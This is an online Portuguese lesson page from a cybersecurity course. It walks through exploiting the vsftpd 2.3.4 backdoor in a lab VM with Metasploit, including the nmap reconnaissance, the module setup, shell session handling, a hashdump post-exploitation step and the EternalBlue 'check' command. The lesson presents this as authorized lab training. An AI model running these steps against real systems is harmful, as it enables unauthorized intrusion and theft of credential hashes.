Cyber Security Academy · Aula

Exploração de uma Vulnerabilidade Conhecida

Use um módulo de exploit contra um alvo vulnerável em um laboratório; interprete a saída da sessão.

Aula 2 de 413 etapas

Exploração de uma Vulnerabilidade Conhecida é uma aula grátis de Cyber Security Academy no CoddyKit. Esta é a aula 2 de 4. Você pode ler a aula completa abaixo gratuitamente — depois pratica ao vivo no navegador com um editor de código integrado e um tutor de IA 24/7. Faz parte do caminho de aprendizado de Cyber Security Academy, e seu progresso é sincronizado entre a web e o app CoddyKit. O curso de Cyber Security Academy inclui 4 aulas no total.

Ética e autorização em primeiro lugar

A exploração só é legal contra sistemas que pertencem a você ou para os quais tenha autorização explícita e por escrito para realizar testes. Todos os exemplos aqui destinam-se a ambientes de laboratório autorizados. A exploração não autorizada é uma infração criminal.

Recomendação para configuração do laboratório

Use máquinas virtuais intencionalmente vulneráveis: Metasploitable2/3, DVWA, máquinas do VulnHub ou HackTheBox/TryHackMe para praticar legalmente. Nunca faça testes em sistemas de produção ou do mundo real sem um documento de escopo assinado.

# Download Metasploitable2
# https://sourceforge.net/projects/metasploitable/

# Or use VulnHub
# https://www.vulnhub.com/

# Network: host-only adapter (isolated)

Reconhecimento antes da exploração

Faça sempre a enumeração antes da exploração. Conheça a versão exata do serviço, o OS e o contexto antes de selecionar uma exploração. Versão incorreta = exploração malsucedida ou falha do sistema.

sudo nmap -sV -O 192.168.1.100

# Identify:
# - OS version
# - Service + exact version
# - Open ports
# Then search Metasploit for matching exploit

Selecionando a exploração correta

Pesquise pelo nome e pela versão do serviço. Prefira módulos classificados como Excellent ou Great. Leia o info para confirmar se a plataforma de destino e o intervalo de versões correspondem.

msf6 > search vsftpd 2.3.4
# exploit/unix/ftp/vsftpd_234_backdoor
# Rank: Excellent

msf6 > info exploit/unix/ftp/vsftpd_234_backdoor

Configurando e executando a exploração

Defina RHOSTS (destino remoto), LHOST (seu IP para conexões reversas), LPORT (porta de escuta), selecione uma carga útil e execute. Observe a criação de uma sessão ou as mensagens de erro.

msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
msf6 > set RHOSTS 192.168.1.100
msf6 > set payload cmd/unix/interact
msf6 > run

# [*] Command shell session 1 opened

Interpretando os resultados

Uma exploração bem-sucedida abre uma sessão. Explorações malsucedidas exibem mensagens de erro: conexão recusada (a porta não está aberta), exploração malsucedida (versão incorreta), nenhuma sessão criada (a carga útil não conseguiu estabelecer a conexão de retorno).

# Success:
[*] Started reverse TCP handler
[*] Command shell session 1 opened

# Failure:
[-] Exploit aborted: Bad return value from check
[-] Exploit failed: No session was created

Interagindo com uma sessão

Após a exploração, interaja com a sessão usando sessions -i . As sessões básicas de console de comandos fornecem um terminal; as sessões do Meterpreter oferecem uma API abrangente.

msf6 > sessions          # list all sessions
msf6 > sessions -i 1     # interact with session 1

# Once inside:
id
whoami
ifconfig
uname -a

Colocando sessões em segundo plano e gerenciando várias sessões

Pressione Ctrl+Z para colocar uma sessão em segundo plano e retornar ao msfconsole. Isso permite gerenciar várias sessões ou executar módulos de pós-exploração em uma sessão específica.

# Background active session
Ctrl+Z

# List sessions
msf6 > sessions

# Run post module against session 1
msf6 > use post/linux/gather/hashdump
msf6 > set SESSION 1
msf6 > run

Comando de verificação

Muitos módulos de exploração implementam um comando check que testa se o destino é vulnerável sem realmente explorá-lo. Sempre execute a verificação primeiro, quando disponível.

msf6 exploit(ms17_010_eternalblue) > check

# [+] 192.168.1.100:445 - The target is vulnerable.
# Or:
# [-] 192.168.1.100:445 - The target is not vulnerable.

Considerações sobre a confiabilidade das explorações

As explorações podem interromper serviços, disparar alertas ou deixar registros. Em avaliações de produção: programe as explorações para períodos de baixo tráfego, tenha um plano de reversão e confirme a existência de cópias de segurança antes de executar qualquer ação destrutiva.

Documentando a exploração

Registre: data e hora, IP e porta do destino, módulo de exploração usado, número do CVE, carga útil usada, sessão obtida e evidências (captura de tela ou saída do terminal). Essa é a prova da vulnerabilidade para o relatório.

Verificação rápida

O que o comando "check" do Metasploit faz?

Resumo: explorando vulnerabilidades

A exploração ética segue um fluxo claro: obtenha autorização por escrito, faça a enumeração com cuidado, selecione a exploração correspondente, leia as informações do módulo, execute a verificação primeiro quando disponível, prossiga com a execução e documente tudo. Nunca faça uma exploração sem autorização — a habilidade técnica e o limite ético são inseparáveis.

Grátis para começar

Aprenda Cyber Security Academy com um tutor de IA — grátis

Escreva e execute código real no seu navegador, obtenha ajuda instantânea de um tutor de IA 24/7 e continue de onde parou na web ou no app.

Cursos
76
Aulas
303

Perguntas Frequentes

A aula “Exploração de uma Vulnerabilidade Conhecida” é grátis?

Sim — o texto completo de “Exploração de uma Vulnerabilidade Conhecida” é grátis para ler aqui na web. Para praticá-la interativamente (um editor de código integrado e um tutor de IA 24/7) e desbloquear o restante do curso de Cyber Security Academy, atualize para CoddyKit PRO. O curso de Cyber Security Academy inclui 4 aulas no total.

O que vou aprender em “Exploração de uma Vulnerabilidade Conhecida”?

Use um módulo de exploit contra um alvo vulnerável em um laboratório; interprete a saída da sessão. Você pratica Cyber Security Academy com código prático que executa diretamente no navegador, e um tutor de IA 24/7 responde suas dúvidas enquanto trabalha na aula.

Preciso ter experiência prévia para começar Cyber Security Academy?

Nenhuma experiência prévia é necessária. Cyber Security Academy no CoddyKit é estruturado para alunos iniciantes até avançados, então você pode começar aqui ou desde o início e aprender no seu ritmo. Esta é a aula 2 de 4.

Quanto tempo leva a aula “Exploração de uma Vulnerabilidade Conhecida”?

A maioria das aulas CoddyKit leva cerca de 5–10 minutos. Cada uma é compacta e interativa, então você faz progresso constante e retoma exatamente de onde parou entre web e app.

Posso escrever e executar código nesta aula de Cyber Security Academy?

Sim. Cada aula de Cyber Security Academy inclui um editor de código integrado, então você escreve e executa código real direto no navegador e recebe feedback de IA instantaneamente — nenhuma configuração local necessária.

Todas as aulas deste curso

  1. Arquitetura do Metasploit e msfconsole
  2. Exploração de uma Vulnerabilidade Conhecida
  3. Cargas: em Estágios ou sem Estágios, Meterpreter
  4. Pós-Exploração: Pivotar e Persistir
← Voltar para Cyber Security Academy